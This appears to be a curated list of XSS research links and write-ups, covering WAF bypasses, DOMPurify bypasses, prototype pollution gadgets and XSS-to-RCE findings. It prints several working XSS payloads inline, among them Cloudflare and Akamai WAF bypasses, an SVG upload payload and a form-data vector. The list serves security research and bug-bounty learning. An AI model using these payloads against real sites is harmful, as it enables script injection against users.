How we escalated a DOM XSS to a sophisticated 1-click Account Takeover, a great article by Benasin and Long Phan Nguyên
Part 1: bit.ly/49N43qs
Part 2: bit.ly/3xXB2Ld

A cloudflare WAF bypass payload, reposted by Clandestine
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E

A nice collection of Server-Side Prototype Pollution gadgets by Mikhail Shcherbakov and the KTH Royal Institute of Technology
github.com/KTH-LangSec/se…

A confeti payload for nicer XSS, by renniepak
Demo: bit.ly/3vYQHJC
Code: 0-a.nl/conf.js

Bypasses for the most popular WAFs, a useful scheatsheet by Project NZT-48
bit.ly/3UiyoZv

Some more payloads, by VAIDIK PANDYA
x.com/h4x0r_fr34k/st…

Nice collection of XSS filters bypasses by Edra
github.com/Edr4/XSS-Bypas…

XSS WAF Bypass One payload for all, interesting evasion technique by Edra
bit.ly/3xvW5oc

April XSS challenge by Intigriti
challenge-0424.intigriti.io

Bypassing DOMPurify with good old XML, nice findings by RyotaK
bit.ly/4amINc3

2 interesting XSS writeups by sudi
github.com/Sudistark/xss-…

SVG File upload payload by Stealthy

<svg> <foreignObject width='100%' height='100%'> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>

x.com/stealthybugs/s…

DOM Purify - untrusted Node bypass, a way to bypass DOMPurify when used in a specific way, by slonser
bit.ly/4aolQoo

March XSS challenge by Intigriti
challenge-0324.intigriti.io

Akamai WAF bypass XSS, by smaury
<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>
click and write here!

Reply to calc: The Attack Chain to Compromise Mailspring, great finding turning an XSS to an RCE, by Yaniv Nizry
bit.ly/3ThiInh

Form submission vector, by Mateo Hanžek
<form onformdata='alert(1)'><button>Click</button></form>

Now added to PortSwigger Research XSS Cheatsheet:
portswigger.net/web-security/c…

OpenNMS Vulnerabilities: Securing Code against Attackers’ Unexpected Ways, excellent article by Stefan Schiller using SNMP traps as XSS vector and leading to RCE.
bit.ly/4372FNA

Exploiting CSP Wildcards for Google Domains, a nice finding by Attacks Ships On Fire (attackshipsonfi.re)
bit.ly/3P2bjXH

Go Go XSS Gadgets: Chaining a DOM Clobbering Exploit in the Wild, excellent finding by Brett Buerhaus , Sam Curry and xEHLE
bit.ly/3T8Cp1Z